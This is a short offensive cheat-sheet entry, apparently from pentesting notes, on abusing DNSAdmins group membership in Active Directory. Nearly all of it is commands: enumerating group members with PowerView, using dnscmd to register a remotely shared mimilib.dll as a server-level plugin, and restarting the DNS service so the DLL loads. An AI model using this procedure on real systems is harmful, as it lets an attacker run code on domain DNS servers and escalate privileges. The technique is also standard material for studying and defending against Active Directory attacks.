# DNS Admins

### **Enumerate member of the DNS admin group**

```
Get-NetGRoupMember “DNSAdmins”
```

### **From the privilege of DNSAdmins group member, configue DDL using dnscmd.exe (needs RSAT DNS)**

Share the directory the DLL is in for everyone so it's accessible. logs all DNS queries on C:\Windows\System32\kiwidns.log

```
Dnscmd <dns server> /config /serverlevelplugindll \\<ip>\dll\mimilib.dll
```

**Restart DNS**

```
Sc \\<dns server> stop dns
Sc \\<dns server> start dns
```